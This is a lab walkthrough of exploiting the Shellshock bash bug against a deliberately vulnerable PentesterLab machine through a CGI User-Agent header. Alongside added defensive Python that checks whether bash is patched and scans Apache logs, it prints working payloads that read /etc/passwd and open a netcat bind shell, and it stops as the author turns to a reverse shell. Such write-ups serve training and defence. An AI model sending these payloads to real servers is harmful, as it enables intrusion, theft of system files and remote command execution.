How to Exploit the ShellShock/Bash Bug CVE-2014-6271 Vulnerability
The "Shellshock" or "Bash Bug" vulnerability was disclosed on September 24, 2014, and was assigned the identifier CVE-2014-6271. According to NIST, "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution" (https://nvd.nist.gov/vuln/detail/CVE-2014-6271).
To exploit this vulnerability, I used a deliberately vulnerable virtual machine installed on a Hyper-V instance. The machine itself was downloaded from a lab at PentesterLab (https://pentesterlab.com). I also used a virtualized image of Kali Linux (see image below for version and OS details). Additional tools used were Burp Suite (which comes pre-installed on Kali) and the FoxyProxy add-on for Firefox (https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard).
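The NIST description above is the whole bug in one sentence: a vulnerable bash, when it starts, looked for environment variables whose value begins with the exact text "() {", imported each one as a shell function, and then kept parsing and executing whatever followed the function body. The following host check is an added example written for this page, not code from the original post or from PentesterLab; it reproduces the standard remediation test by exporting a constructed variable with trailing text and observing whether the trailing command runs. The variable name SHELLSHOCK_PROBE and the marker string PROBE_RAN are arbitrary choices.

```python
import os
import shutil
import subprocess


def is_function_import_candidate(value):
    """Mirror the prefix test the pre-fix bash applied to every environment value:
    only values beginning with exactly "() {" were treated as an exported function,
    and on an unpatched build the text after the function body was executed too.
    Leading whitespace or a space inside the parentheses does not qualify."""
    return value.startswith("() {")


def bash_vulnerable(bash_path=None):
    """Return True if the bash binary still executes trailing text after an
    imported function definition (CVE-2014-6271), False if it is patched, and
    None if no bash is available to test or the probe could not be run."""
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return None
    env = dict(os.environ)
    # Constructed probe: a function body followed by a trailing command. A patched
    # bash ignores old-style definitions entirely, so PROBE_RAN never appears.
    env["SHELLSHOCK_PROBE"] = "() { :; }; echo PROBE_RAN"
    try:
        result = subprocess.run(
            [bash, "-c", "echo probe_done"],
            env=env,
            capture_output=True,
            text=True,
            timeout=10,
        )
    except (OSError, subprocess.SubprocessError):
        return None
    return "PROBE_RAN" in result.stdout


if __name__ == "__main__":
    state = bash_vulnerable()
    if state is None:
        print("no bash binary found; nothing tested")
    elif state:
        print("bash is VULNERABLE to CVE-2014-6271: update it before anything else")
    else:
        print("bash ignores trailing text after function definitions: patched")
```

Run this on each host that exposes bash across a privilege boundary (CGI scripts, sshd ForceCommand wrappers, DHCP client hooks); a True result means any process that can set an environment variable for a bash child can run commands as that child.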
Once the vulnerable machine was installed on Hyper-V, my first step was to assign it a static IP address using the command sudo ifconfig eth0 192.168.1.5 netmask 255.255.255.0
To confirm the static IP was set, I ran the command ifconfig
I followed this by opening Burp Suite in Kali and binding the proxy listener to loopback only (127.0.0.1) on port 8181. I also disabled interception, as it was not needed to perform this exploit.
The next thing I did was set up FoxyProxy in the web browser with the localhost address (127.0.0.1) and port 8181. I named this proxy 'Adam's Proxy'. Once it was configured, I enabled routing of all traffic through the proxy.
Next, I opened the Firefox web browser in my Kali instance and navigated to the vulnerable machine.
Since this attack on ShellShock/Bash Bug CVE-2014-6271 uses a CGI script as the vector (the web server copies request headers such as User-Agent into environment variables before the script runs), I sent the request to Burp's Repeater to start manipulating headers and see how I could begin exploiting the vulnerability.
To test for the ShellShock/Bash Bug CVE-2014-6271, I changed the User-Agent field to run the command () { :;}; echo $(</etc/passwd) which returned the contents of the passwd file.
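Because the request above leaves the payload in the web server's access log (the User-Agent, Referer and request line are all logged, and all of them end up in the CGI environment), the same test is straightforward to detect after the fact. The log scanner below is an added example written for this page, not code from the original post; it parses Apache "combined" format lines, URL-decodes the request target so a query-string variant is caught, and flags any field carrying the function-definition marker. The log lines are constructed samples, and the slightly loose regex (whitespace tolerated around the parentheses) is a deliberate choice to also surface malformed or probing attempts that bash itself would not import.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent".
# Simplification: escaped quotes inside the quoted fields are not handled.
COMBINED_LOG = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Bash only imports values that begin with exactly "() {"; the optional whitespace
# here widens the net so mangled variants still raise an alert for review.
SHELLSHOCK_MARK = re.compile(r"\(\s*\)\s*\{")

# Constructed sample log lines: one ordinary browser hit, one User-Agent payload as
# in the test above, one URL-encoded query-string variant, and one unparseable line.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.77 - - [24/Sep/2014:10:12:05 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 1024 "-" "() { :;}; echo $(</etc/passwd)"',
    '192.0.2.78 - - [24/Sep/2014:10:12:09 +0000] '
    '"GET /cgi-bin/status?x=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20probe HTTP/1.1" '
    '500 0 "-" "curl/7.38.0"',
    "not a log line",
]


def parse_combined(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    match = COMBINED_LOG.match(line)
    return match.groupdict() if match else None


def find_shellshock(line):
    """Return (field, decoded_value) pairs for every CGI-exposed field in the line
    that carries the Shellshock marker; an empty list means nothing suspicious."""
    record = parse_combined(line)
    if record is None:
        return []
    hits = []
    for field in ("request", "referer", "agent"):
        value = unquote(record[field])  # request targets are logged URL-encoded
        if SHELLSHOCK_MARK.search(value):
            hits.append((field, value))
    return hits


def scan(lines):
    """Return a list of (1-based line number, hits) for every flagged line."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        hits = find_shellshock(line)
        if hits:
            flagged.append((number, hits))
    return flagged


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        for field, value in hits:
            print(f"line {number}: shellshock marker in {field}: {value!r}")
```

The same check applies to any header a CGI setup exports (Cookie, Host and custom headers included), so in production the field list should follow whatever the server actually places into the environment rather than just these three.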
I decided it would be much more interesting to open a shell to execute commands on the vulnerable machine. To do this, I changed the User-Agent to run the following command: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
This command starts a netcat listener on the vulnerable machine on port 9999 that hands a shell to whoever connects.
As you can see, there were no errors returned. Next, I used netcat on my local machine to connect to port 9999 on the vulnerable box. From here, I was able to execute commands and root the machine.
Next, I wanted to see if I could create a reverse shell. Since most machines in the wild will have some sort of firewall that blocks attackers from access over random ports, I am going to connect over known open ports used for web servers (80, 443).